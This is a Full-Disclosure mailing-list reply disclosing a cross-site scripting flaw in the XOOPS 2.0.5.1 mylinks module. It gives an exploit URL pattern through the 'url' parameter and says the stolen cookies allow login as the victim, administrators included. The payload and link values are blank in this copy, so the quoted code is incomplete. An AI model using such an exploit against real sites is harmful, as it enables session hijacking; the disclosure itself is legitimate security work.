Re: [Full-Disclosure] XSS vulnerability in XOOPS 2.0.5.1

[Chintan Trivedi]

Another and easier way to exploit it will be   . . . <td class='bg4' align="center"><small> <a target="main" href=""><? echo _MD_RATETHISSITE; ?></a> | <a target="main" href=""><? echo _MD_MODIFY; ?></a> | <a target="main" href=""><? echo _MD_REPORTBROKEN; ?></a> | <a target='_top' href=''><? echo _MD_TELLAFRIEND; ?></a> | <a target='_top' href="">Back to <? echo $xoopsConfig['sitename']; ?></a> | <a target='_top' href="">Close Frame</a> </small> . . ----------------------------------- The value for variable "url" is used in line <a target='_top' href="">Close Frame</a> Thus an attacker can pass a _javascript_ code as a value for variable url and get it executed as soon as the victim clicks the "Close Frame" link. 6. Exploit ========== http://[target]/modules/mylinks/myheader.php?url=""> Clicking the above link, the victim gets directed to a page containing a link "Close Frame" which is actually the _javascript_ code inserted by the attacker. The cookie revealed is quite informatic for the attacker to login with the hijacked user (including admin) privileges. 7. Credits ========== Chintan Trivedi - http://www.hackersprogrammers.com "Eye on Security Research Group - India " - www.eos-india.net